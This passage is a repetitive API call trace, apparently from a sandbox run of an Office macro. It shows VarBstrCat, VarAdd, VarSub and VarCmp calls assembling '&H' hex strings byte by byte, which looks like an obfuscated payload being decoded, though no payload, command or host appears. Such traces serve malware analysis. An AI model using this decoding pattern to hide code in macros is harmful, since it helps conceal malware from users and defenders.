pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.626] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.626] VarBstrCat (in: bstrLeft="&H7", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.626] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.626] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.626] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.626] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.626] VarBstrCat (in: bstrLeft="&Hb", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.626] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.626] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.628] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.628] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.628] VarBstrCat (in: bstrLeft="&Hf", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.628] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.628] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.628] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.629] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.629] VarBstrCat (in: bstrLeft="&Hf", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.629] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.629] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.629] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.629] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.629] VarBstrCat (in: bstrLeft="&H3", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.629] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.629] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.629] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.629] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.629] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.629] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.629] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.629] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.630] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.630] VarBstrCat (in: bstrLeft="&H3", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.630] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.630] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.630] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.630] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.630] VarBstrCat (in: bstrLeft="&H7", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.630] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.630] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.630] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.630] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.630] VarBstrCat (in: bstrLeft="&He", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.630] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.630] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.630] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.631] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.631] VarBstrCat (in: bstrLeft="&He", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.631] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.631] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.631] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.631] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.633] VarBstrCat (in: bstrLeft="&H7", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.633] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.633] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.633] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.633] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.633] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.633] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.633] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.633] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.633] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.633] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.633] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.633] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.633] VarBstrCat (in: bstrLeft="&H0", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.633] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.634] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.634] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.634] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.634] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.634] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.634] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.634] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.635] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.635] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.635] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.635] VarBstrCat (in: bstrLeft="&H", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.635] VarBstrCat (in: bstrLeft="&H5", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.635] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.635] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.636] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.636] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.636] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.636] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.636] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.636] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.636] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.636] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.636] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.636] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.636] VarBstrCat (in: bstrLeft="&Hc", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.636] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.636] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.636] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.636] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.636] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.636] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.636] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.636] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.636] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.637] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.637] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.637] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.637] VarBstrCat (in: bstrLeft="&He", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.637] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.637] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.637] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.637] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.637] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.637] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.637] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.637] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.637] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.637] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.637] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.637] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.637] VarBstrCat (in: bstrLeft="&Hf", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.637] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.638] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.638] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.638] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.638] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.638] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.638] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.638] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.638] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.638] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.638] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.638] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.638] VarBstrCat (in: bstrLeft="&Hb", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.638] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.638] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.638] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.638] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.638] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.638] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.638] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.638] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.638] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.639] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.639] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.639] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.639] VarBstrCat (in: bstrLeft="&Hb", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.639] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.639] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.639] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.639] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.639] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.639] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.639] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.639] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.639] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.639] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.639] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.639] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.639] VarBstrCat (in: bstrLeft="&Hc", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.640] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.640] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.640] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.640] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.640] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.640] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.640] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.640] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.641] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.641] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.642] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.642] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.642] VarBstrCat (in: bstrLeft="&Ha", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.642] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.642] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.642] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.642] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.642] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.642] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.642] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.642] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.642] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.642] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.642] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.643] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.643] VarBstrCat (in: bstrLeft="&Hf", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.643] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.643] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.643] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.643] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.643] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.643] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.643] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.643] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.643] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.643] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.643] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.643] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.643] VarBstrCat (in: bstrLeft="&H8", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.643] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.643] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.643] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.643] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.643] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.644] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.644] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.644] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.644] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.644] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.644] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.644] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.644] VarBstrCat (in: bstrLeft="&Hf", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.644] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.644] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.644] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.644] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.644] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.644] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.644] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.644] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.644] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.645] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 